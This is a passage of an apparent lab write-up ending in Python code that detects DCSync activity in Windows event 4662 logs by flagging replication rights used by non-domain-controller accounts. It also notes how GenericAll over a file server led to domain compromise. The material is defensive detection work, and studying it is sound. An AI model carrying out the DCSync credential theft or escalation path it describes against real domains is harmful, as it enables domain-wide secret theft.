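    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    data["EventID"] = root.findtext("e:System/e:EventID", namespaces=NS)
    data["Computer"] = root.findtext("e:System/e:Computer", namespaces=NS)
    return data


def detect_dcsync(xml_events, dc_accounts):
    """Return alerts for 4662 events that exercise replication rights from a non-DC account."""
    allow = {a.lower() for a in dc_accounts}
    alerts = []
    for xml_text in xml_events:
        ev = parse_4662(xml_text)
        if ev.get("EventID") != "4662":
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.lower() in allow:
            continue   # DC-to-DC replication is expected
        alerts.append({
            "subject": f"{ev.get('SubjectDomainName', '')}\\{subject}",
            "rights": rights,
            "dc": ev.get("Computer"),
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, dc_accounts={"DC$", "DC2$"}):
        print(f"DCSync indicator on {a['dc']}: {a['subject']} used {', '.join(a['rights'])}")
```

Maintain the allowlist from the Domain Controllers OU rather than by hand, and pair this with a review of who holds the two replication rights on the domain head: in this lab a file server's computer account had them, which is what turned GenericAll over that server into full domain compromise.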
